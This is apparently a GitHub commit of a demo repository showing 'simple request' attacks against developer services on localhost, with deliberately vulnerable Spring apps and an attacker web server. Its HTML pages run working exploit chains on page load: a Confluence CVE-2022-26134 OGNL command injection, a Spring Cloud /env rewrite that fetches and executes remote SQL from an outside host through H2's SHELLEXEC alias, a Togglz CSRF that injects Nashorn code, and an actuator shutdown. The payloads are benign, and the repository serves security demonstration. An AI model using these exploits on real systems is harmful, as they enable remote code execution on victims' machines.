STRLCPY/simple-request-attacks

■ ■ ■ ■ ■ ■

README.md

1	+	To run
2	+
3	+	edit /etc/hosts and add
4	+	127.0.0.1 somerandomsite.bla
5	+
6	+	To run the webserver
7	+	cd webserver/
8	+	./rebuild.sh
9	+
10	+	This starts the webserver on port 8081.
11	+
12	+	To start up on of the vulnerable services.
13	+	cd into spring-cloud-v1-vuln or spring-boot-hello-world-feature-enum
14	+	and run
15	+	mvn clean spring-boot:run
16	+	which will build and run the vulnerable service
17	+	This requires Java 8. It may work with newer Java versions, but not tested.
18	+
19	+
20	+
21	+	Then open a web browser at http://somerandomsite.bla:8081
22	+	Then select the link which matches the vulnerable service currently running.
23	+	The shutdown payload works with both services.
24	+

■ ■ ■ ■ ■ ■

spring-boot-hello-world-feature-enum/.gitignore

1	+	.idea/
2	+	target/
3	+

■ ■ ■ ■ ■ ■

spring-boot-hello-world-feature-enum/README.md

1	+
2	+	Run `mvn clean spring-boot:run`
3	+	Requires Java <15 . Preferably Java 8. As Togglz Java Scripting API relies on Nashorn which was removed from Java in 15.
4	+
5	+

■ ■ ■ ■ ■ ■

spring-boot-hello-world-feature-enum/pom.xml

1	+	<?xml version="1.0" encoding="UTF-8"?>
2	+	<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
3	+	<modelVersion>4.0.0</modelVersion>
4	+
5	+	<properties>
6	+	<java.version>1.8</java.version>
7	+	<togglz.version>2.7.2</togglz.version>
8	+	<spring-boot.version>2.3.1.RELEASE</spring-boot.version>
9	+	</properties>
10	+
11	+	<groupId>org.togglz.samples</groupId>
12	+	<artifactId>togglz-sample-spring-boot-hello-world-feature-enum</artifactId>
13	+	<version>1.0.0-SNAPSHOT</version>
14	+
15	+
16	+	<name>Togglz Sample Spring Boot Hello World Feature Enum</name>
17	+	<description>Togglz Sample Spring Boot Hello World Feature Enum</description>
18	+
19	+
20	+	<dependencies>
21	+	<dependency>
22	+	<groupId>org.togglz</groupId>
23	+	<artifactId>togglz-core</artifactId>
24	+	<version>${togglz.version}</version>
25	+	</dependency>
26	+
27	+	<dependency>
28	+	<groupId>org.togglz</groupId>
29	+	<artifactId>togglz-console</artifactId>
30	+	<version>${togglz.version}</version>
31	+	</dependency>
32	+
33	+	<dependency>
34	+	<groupId>org.togglz</groupId>
35	+	<artifactId>togglz-junit</artifactId>
36	+	<version>${togglz.version}</version>
37	+	<scope>test</scope>
38	+	</dependency>
39	+
40	+	<dependency>
41	+	<groupId>org.togglz</groupId>
42	+	<artifactId>togglz-servlet</artifactId>
43	+	<version>${togglz.version}</version>
44	+	</dependency>
45	+
46	+	<dependency>
47	+	<groupId>org.togglz</groupId>
48	+	<artifactId>togglz-spring-core</artifactId>
49	+	<version>${togglz.version}</version>
50	+	</dependency>
51	+
52	+	<dependency>
53	+	<groupId>org.togglz</groupId>
54	+	<artifactId>togglz-spring-security</artifactId>
55	+	<version>${togglz.version}</version>
56	+	</dependency>
57	+
58	+	<dependency>
59	+	<groupId>org.togglz</groupId>
60	+	<artifactId>togglz-spring-boot-starter</artifactId>
61	+	<version>${togglz.version}</version>
62	+	</dependency>
63	+
64	+	<dependency>
65	+	<!-- Import dependency management from Spring Boot -->
66	+	<groupId>org.springframework.boot</groupId>
67	+	<artifactId>spring-boot-dependencies</artifactId>
68	+	<version>${spring-boot.version}</version>
69	+	<type>pom</type>
70	+	<scope>import</scope>
71	+	</dependency>
72	+	<dependency>
73	+	<groupId>org.springframework.boot</groupId>
74	+	<artifactId>spring-boot-starter-actuator</artifactId>
75	+	<version>${spring-boot.version}</version>
76	+	</dependency>
77	+
78	+	<dependency>
79	+	<groupId>org.springframework.boot</groupId>
80	+	<artifactId>spring-boot-starter-web</artifactId>
81	+	<version>${spring-boot.version}</version>
82	+	</dependency>
83	+
84	+	<dependency>
85	+	<groupId>org.springframework.boot</groupId>
86	+	<artifactId>spring-boot-starter-test</artifactId>
87	+	<version>${spring-boot.version}</version>
88	+	<scope>test</scope>
89	+	</dependency>
90	+
91	+
92	+
93	+
94	+	</dependencies>
95	+
96	+	<build>
97	+	<plugins>
98	+	<plugin>
99	+	<groupId>org.springframework.boot</groupId>
100	+	<artifactId>spring-boot-maven-plugin</artifactId>
101	+	<version>${spring-boot.version}</version>
102	+	</plugin>
103	+	<plugin>
104	+	<groupId>org.apache.maven.plugins</groupId>
105	+	<artifactId>maven-compiler-plugin</artifactId>
106	+	<configuration>
107	+	<source>${java.version}</source>
108	+	<target>${java.version}</target>
109	+	</configuration>
110	+	</plugin>
111	+	<plugin>
112	+	<groupId>org.springframework.boot</groupId>
113	+	<artifactId>spring-boot-maven-plugin</artifactId>
114	+	</plugin>
115	+
116	+	<plugin>
117	+	<groupId>org.apache.maven.plugins</groupId>
118	+	<artifactId>maven-war-plugin</artifactId>
119	+	<version>2.6</version>
120	+	<configuration>
121	+	<failOnMissingWebXml>false</failOnMissingWebXml>
122	+	</configuration>
123	+	</plugin>
124	+	</plugins>
125	+	</build>
126	+
127	+	</project>
128	+
129	+

■ ■ ■ ■ ■ ■

spring-boot-hello-world-feature-enum/src/main/java/sample/Application.java

1	+	package sample;
2	+
3	+	import org.springframework.boot.SpringApplication;
4	+	import org.springframework.boot.autoconfigure.SpringBootApplication;
5	+
6	+	@SpringBootApplication
7	+	public class Application {
8	+
9	+	public static void main(String[] args) {
10	+	SpringApplication.run(Application.class, args);
11	+	}
12	+	}
13	+

■ ■ ■ ■ ■ ■

spring-boot-hello-world-feature-enum/src/main/java/sample/Features.java

1	+	package sample;
2	+
3	+	import org.togglz.core.Feature;
4	+	import org.togglz.core.annotation.EnabledByDefault;
5	+	import org.togglz.core.annotation.Label;
6	+	import org.togglz.core.context.FeatureContext;
7	+
8	+	public enum Features implements Feature {
9	+
10	+	@Label("just a description")
11	+	@EnabledByDefault
12	+	HELLO_WORLD,
13	+
14	+	@Label("another description")
15	+	REVERSE_GREETING;
16	+
17	+	public boolean isActive() {
18	+	return FeatureContext.getFeatureManager().isActive(this);
19	+	}
20	+	}
21	+
22	+

■ ■ ■ ■ ■ ■

spring-boot-hello-world-feature-enum/src/main/java/sample/HelloWorldController.java

1	+	package sample;
2	+
3	+	import org.springframework.http.ResponseEntity;
4	+	import org.springframework.web.bind.annotation.RequestMapping;
5	+	import org.springframework.web.bind.annotation.RestController;
6	+
7	+	@RestController
8	+	public class HelloWorldController {
9	+
10	+	@RequestMapping("/")
11	+	public ResponseEntity<?> index() {
12	+	if (Features.HELLO_WORLD.isActive()) {
13	+	StringBuilder sb = new StringBuilder("Greetings from Spring Boot!");
14	+	if (Features.REVERSE_GREETING.isActive()) {
15	+	sb.reverse();
16	+	}
17	+	return ResponseEntity.ok().body(sb.toString());
18	+	}
19	+	return ResponseEntity.notFound().build();
20	+	}
21	+	}
22	+

■ ■ ■ ■ ■ ■

spring-boot-hello-world-feature-enum/src/main/java/sample/TogglzConfiguration.java

1	+	package sample;
2	+
3	+	import org.springframework.context.annotation.Bean;
4	+	import org.springframework.context.annotation.Configuration;
5	+	import org.togglz.core.manager.EnumBasedFeatureProvider;
6	+	import org.togglz.core.spi.FeatureProvider;
7	+
8	+	@Configuration
9	+	public class TogglzConfiguration {
10	+
11	+	@Bean
12	+	public FeatureProvider featureProvider() {
13	+	return new EnumBasedFeatureProvider(Features.class);
14	+	}
15	+	}
16	+

■ ■ ■ ■ ■ ■

spring-boot-hello-world-feature-enum/src/main/resources/application.yml

1	+	logging:
2	+	level:
3	+	org.togglz: DEBUG
4	+	togglz:
5	+	console:
6	+	secured: false
7	+	use-management-port: false
8	+	management:
9	+	endpoints:
10	+	web:
11	+	exposure:
12	+	include: '*'
13	+	endpoint:
14	+	shutdown:
15	+	enabled: true

■ ■ ■ ■ ■ ■

spring-cloud-v1-vuln/.gitignore

1	+	.idea/
2	+	target/
3	+

■ ■ ■ ■ ■ ■

spring-cloud-v1-vuln/pom.xml

1	+	<?xml version="1.0" encoding="UTF-8"?>
2	+	<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
3	+	xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
4	+	<modelVersion>4.0.0</modelVersion>
5	+
6	+	<groupId>com.contrast</groupId>
7	+	<artifactId>spring-cloud-1-vuln</artifactId>
8	+	<version>0.0.1-SNAPSHOT</version>
9	+	<packaging>jar</packaging>
10	+
11	+	<name>Spring boot application example</name>
12	+	<description>Test project</description>
13	+
14	+	<parent>
15	+	<groupId>org.springframework.boot</groupId>
16	+	<artifactId>spring-boot-starter-parent</artifactId>
17	+	<version>1.5.11.RELEASE</version>
18	+	<relativePath/> <!-- lookup parent from repository -->
19	+	</parent>
20	+
21	+	<properties>
22	+	<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
23	+	<java.version>1.8</java.version>
24	+	<!-- dependency versions -->
25	+	<com.google.guava.guava.version>21.0</com.google.guava.guava.version>
26	+	<io.springfox.springfox-swagger2>2.3.1</io.springfox.springfox-swagger2>
27	+	<io.springfox.springfox-swagger-ui>2.3.1</io.springfox.springfox-swagger-ui>
28	+	</properties>
29	+	<dependencyManagement>
30	+	<dependencies>
31	+	<dependency>
32	+	<groupId>org.springframework.cloud</groupId>
33	+	<artifactId>spring-cloud-dependencies</artifactId>
34	+	<version>Edgware.SR6</version>
35	+	<type>pom</type>
36	+	<scope>import</scope>
37	+	</dependency>
38	+	</dependencies>
39	+	</dependencyManagement>
40	+
41	+	<dependencies>
42	+	<!-- For default Spring Boot utilities -->
43	+	<dependency>
44	+	<groupId>org.springframework.boot</groupId>
45	+	<artifactId>spring-boot-starter</artifactId>
46	+	</dependency>
47	+
48	+	<!-- For testing possibility -->
49	+	<dependency>
50	+	<groupId>org.springframework.boot</groupId>
51	+	<artifactId>spring-boot-starter-test</artifactId>
52	+	<scope>test</scope>
53	+	</dependency>
54	+
55	+	<!-- For all mvc and web functions -->
56	+	<dependency>
57	+	<groupId>org.springframework.boot</groupId>
58	+	<artifactId>spring-boot-starter-web</artifactId>
59	+	</dependency>
60	+
61	+	<!-- Default persistence functions -->
62	+	<dependency>
63	+	<groupId>org.springframework.boot</groupId>
64	+	<artifactId>spring-boot-starter-data-jpa</artifactId>
65	+	</dependency>
66	+
67	+	<dependency>
68	+	<groupId>org.springframework.boot</groupId>
69	+	<artifactId>spring-boot-starter-actuator</artifactId>
70	+	</dependency>
71	+
72	+
73	+	<!-- In-Memory DB -->
74	+	<dependency>
75	+	<groupId>com.h2database</groupId>
76	+	<artifactId>h2</artifactId>
77	+	<scope>runtime</scope>
78	+	</dependency>
79	+
80	+	<!-- Java Utilities from google -->
81	+	<dependency>
82	+	<groupId>com.google.guava</groupId>
83	+	<artifactId>guava</artifactId>
84	+	<version>${com.google.guava.guava.version}</version>
85	+	</dependency>
86	+
87	+	<!-- Include swagger for API description -->
88	+	<dependency>
89	+	<groupId>io.springfox</groupId>
90	+	<artifactId>springfox-swagger2</artifactId>
91	+	<version>${io.springfox.springfox-swagger2}</version>
92	+	</dependency>
93	+
94	+	<!-- Include swagger for API description UI -->
95	+	<dependency>
96	+	<groupId>io.springfox</groupId>
97	+	<artifactId>springfox-swagger-ui</artifactId>
98	+	<version>${io.springfox.springfox-swagger-ui}</version>
99	+	</dependency>
100	+
101	+	<!-- https://mvnrepository.com/artifact/org.springframework.cloud/spring-cloud-starter-config -->
102	+	<dependency>
103	+	<groupId>org.springframework.cloud</groupId>
104	+	<artifactId>spring-cloud-starter-config</artifactId>
105	+	<version>1.4.4.RELEASE</version>
106	+	</dependency>
107	+
108	+	</dependencies>
109	+
110	+	<build>
111	+	<plugins>
112	+	<plugin>
113	+	<groupId>org.springframework.boot</groupId>
114	+	<artifactId>spring-boot-maven-plugin</artifactId>
115	+	</plugin>
116	+	</plugins>
117	+	</build>
118	+
119	+	</project>

■ ■ ■ ■ ■ ■

spring-cloud-v1-vuln/src/main/java/com/contrast/app/Application.java

1	+	package com.contrast.app;
2	+
3	+	import org.springframework.boot.SpringApplication;
4	+	import org.springframework.boot.autoconfigure.SpringBootApplication;
5	+
6	+	@SpringBootApplication
7	+	public class Application {
8	+
9	+	public static void main(String[] args) {
10	+	SpringApplication.run(Application.class, args);
11	+	}
12	+
13	+
14	+	}
15	+

■ ■ ■ ■ ■ ■

spring-cloud-v1-vuln/src/main/java/com/contrast/app/Controller.java

1	+	package com.contrast.app;
2	+
3	+
4	+	import org.springframework.web.bind.annotation.GetMapping;
5	+
6	+	@org.springframework.stereotype.Controller
7	+	public class Controller {
8	+
9	+	@GetMapping("/test")
10	+	public String getRequest() {
11	+	return "hello";
12	+	}
13	+	}
14	+

■ ■ ■ ■ ■ ■

spring-cloud-v1-vuln/src/main/resources/application.properties

1	+	management.security.enabled=false
2	+	endpoints.restart.enabled=true
3	+	endpoints.shutdown.enabled=true
4	+	spring.datasource.username=sa
5	+	spring.datasource.password=
6	+	spring.datasource.driverClassName=org.h2.Driver
7	+	spring.datasource.url = jdbc:h2:mem:testdb
8	+	spring.h2.console.enabled = true
9	+	spring.h2.console.path=/h2-console
10	+	spring.jpa.database-platform=org.hibernate.dialect.H2Dialect
11	+

■ ■ ■ ■ ■ ■

webserver/Dockerfile

1	+	FROM httpd:2.4
2	+	COPY ./public-html/ /usr/local/apache2/htdocs/
3	+

■ ■ ■ ■ ■ ■

webserver/public-html/confluence-cve-2022-26134.html

1	+	<html>
2	+	<head>
3	+	</head>
4	+	<body onload="execConfRCE()">
5	+	This contains the payload for the Confluence RCE. If all goes well you find a file named r7 in /tmp
6	+
7	+	</body>
8	+	<script>
9	+	function execConfRCE() {
10	+
11	+
12	+	var xhr = new XMLHttpRequest();
13	+
14	+	xhr.open("GET", "http://localhost:8090/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/r7%22%29%7D/");
15	+	xhr.send(null);
16	+	}
17	+	</script>
18	+	</html>
19	+

■ ■ ■ ■ ■ ■

webserver/public-html/exec.sql

1	+	CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
2	+	java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A");
3	+	return s.hasNext() ? s.next() : ""; }
4	+	$$;
5	+	CALL SHELLEXEC('open /System/Applications/Calculator.app/')
6	+

■ ■ ■ ■ ■ ■

webserver/public-html/index.html

1	+	<html>
2	+	<head>
3	+	</head>
4	+	<body>
5	+	<center><h1>Simple Request Vulnerabilities in the Developer Environment</h1></center>
6	+	Following the below guide and clicking on the payload link will trigger a RCE on your local machine. In all but one instance this will open the Calculator app. ( assuming you are using a Mac. ) Or for Confluence create a file in /tmp.</br></br>
7	+	<h3> Spring Cloud </h3>
8	+	This works because Spring Cloud V1 allowed the /env actuator to modify properties with a POST request with content type application/x-www-form-urlencoded. Allowing for a Simple Request attack.</br>
9	+	This is done by first setting the spring app's jdbc url to : </br>
10	+	<i>
11	+	spring.datasource.url=jdbc:h2:mem:testdb;INIT=runscript from 'http://somerandomsite.bla:8081/exec.sql'</i></br>
12	+	Then restarting the application so the change takes effect via the /restart actuator. </br>
13	+	On startup, the Spring App will create a in memory H2 database and call out to http://somerandomsite.bla:8081/exec.sql to download the sql and execute it. This leverages a feature of the in memory H2 database to compile and execute a Java method which in turn opens the Calculator app.
14	+	<p><b>To Run : </b></br><i>
15	+	git clone xxx</br>
16	+	cd Simple-Requests/spring-cloud-v1-vuln</br>
17	+	mvn spring-boot:run</br>
18	+	</i>
19	+	<a href="springcloud.html">Payload Link</a></p>
20	+	</br>
21	+	<h3>Togglz</h3>
22	+	This relies on the Togglz CSRF Vulnerability <a href="https://github.com/advisories/GHSA-697v-pxg3-j262">CVE-2020-28191</a>.</br> A Simple Post Request can be made to hit localhost which modifies the feature toggle to execute arbitrary Java code via the Nashorn engine during toggle evaluation.
23	+	<p><b>To Run : </b></br><i>
24	+	cd Simple-Requests/spring-boot-hello-world-feature-enum</br>
25	+	mvn spring-boot:run</br>
26	+	</i>
27	+	<a href="togglz.html">Payload Link</a></p>
28	+
29	+	</br>
30	+	<h3>Spring Actuator Shutdown</h3>
31	+	In Spring V2 actuators require a content-type of application/json. But when a post request does not have a message body, like with the /shutdown actuator, if no content-type is specified the actuator can still be triggered. So a Simple Post Request can be use to shutdown a Spring Boot app bound to localhost.
32	+	<p><b>To Run : </b></br><i>
33	+	cd Simple-Requests/spring-boot-hello-world-feature-enum</br>
34	+	mvn spring-boot:run</br>
35	+	</i>
36	+
37	+	<a href="shutdown.html">Payload Link</a></p>
38	+
39	+	</br>
40	+	<h3>Confluence CVE-2022-26134</h3>
41	+	This Confluence RCE relies on OGNL injection. As it is done via a Simple Get Request, it can be run via a Simple Request accessing localhost or an internal network that the victim has access to.
42	+	<p><b>To Run : </b></br><i>
43	+	git clone https://github.com/vulhub/vulhub.git </br>
44	+	cd vulhub/confluence/CVE-2022-26134 </br>
45	+	docker-compose up
46	+	<i></br>
47	+
48	+	<a href="confluence-cve-2022-26134.html"> Payload Link </a></p>
49	+	</body>
50	+
51	+
52	+	</html>
53	+

■ ■ ■ ■ ■ ■

webserver/public-html/shutdown.html

1	+	<html>
2	+	<head>
3	+	</head>
4	+	<body onload="shutdownActuator()">
5	+	This contains the payload to shutdown Spring applications containing the /shutdown Actuator
6	+	</body>
7	+
8	+	<script>
9	+	function shutdownActuator() {
10	+	var shutdownOld = new XMLHttpRequest();
11	+	shutdownOld.open("POST", "http://localhost:8080/shutdown");
12	+	shutdownOld.send(null);
13	+	var shutdownNew = new XMLHttpRequest();
14	+	shutdownNew.open("POST", "http://localhost:8080/actuator/shutdown");
15	+	shutdownNew.send(null);
16	+	}
17	+	</script>
18	+
19	+	</html>
20	+
21	+

■ ■ ■ ■ ■ ■

webserver/public-html/springcloud.html

1	+	<html>
2	+	<head>
3	+	</head>
4	+	<body onload="execActuator()">
5	+	This contains the payload for the Spring Cloud V1 RCE. If all goes well you should see the calculator app open.
6	+	</body>
7	+
8	+	<script>
9	+	function execActuator() {
10	+
11	+	var xhr = new XMLHttpRequest();
12	+	xhr.addEventListener("readystatechange", function() {
13	+	if(this.readyState === 4) {
14	+	console.log(this.responseText);
15	+
16	+	}
17	+	});
18	+
19	+	xhr.open("POST", "http://localhost:8080/env?spring.datasource.url=jdbc:h2:mem:testdb;INIT=runscript%20from%20'http://somerandomsite.bla:8081/exec.sql'");
20	+	xhr.onprogress = function () {
21	+	console.log('LOADING: ', xhr.status);
22	+	};
23	+
24	+	xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
25	+	xhr.send(null);
26	+
27	+	var res = new XMLHttpRequest();
28	+
29	+	res.addEventListener("readystatechange", function() {
30	+	if(this.readyState === 4) {
31	+	console.log(this.responseText);
32	+
33	+	}
34	+	});
35	+
36	+	res.open("POST", "http://localhost:8080/restart");
37	+	res.onreadystatechange = function () {
38	+	console.log('LOADINGXXX: ', res.status);
39	+	};
40	+
41	+	res.onload = function () {
42	+	console.log('DONEX: ', res.status);
43	+	};
44	+	res.send(null);
45	+
46	+	}
47	+	</script>
48	+
49	+	</html>
50	+

■ ■ ■ ■ ■ ■

webserver/public-html/togglz.html

1	+	<html>
2	+	<head>
3	+	</head>
4	+	<body onload="execTogglz()">
5	+	This contains the payload for the Togglz RCE. If all goes well you should see the calculator app open.
6	+
7	+	</body>
8	+	<script>
9	+	function execTogglz() {
10	+
11	+	var data = "f=HELLO_WORLD&enabled=enabled&strategy=script&p1=&p2=&p3=&p4=ECMAScript&p5=java.lang.Runtime.getRuntime%28%29.exec%28%27open+%2FSystem%2FApplications%2FCalculator.app%2F%27%29%3B%0D%0A0+%3D%3D+0%3B&p6=&p7=&p8=&p9=&p10=&p11=&p12=&p13=&p14=&p15=&p16=";
12	+
13	+	var xhr = new XMLHttpRequest();
14	+
15	+	xhr.open("POST", "http://localhost:8080/togglz-console/edit");
16	+	xhr.setRequestHeader("content-type", "application/x-www-form-urlencoded");
17	+	xhr.send(data);
18	+	sleep(1000);
19	+	var triggerFeatureToggle = new XMLHttpRequest();
20	+	triggerFeatureToggle.open("GET", "http://localhost:8080/");
21	+	triggerFeatureToggle.send(null);
22	+	}
23	+	function sleep(ms) {
24	+	return new Promise(resolve => setTimeout(resolve, ms));
25	+	}
26	+	</script>
27	+	</html>
28	+

■ ■ ■ ■ ■ ■

webserver/rebuild.sh

1	+	docker stop `docker ps\|grep -v CONT \|awk '{print $1}'`
2	+	docker rmi apache2
3	+	docker build -t apache2 .
4	+	docker run --rm -dit -p 8081:80 apache2
5	+

first commit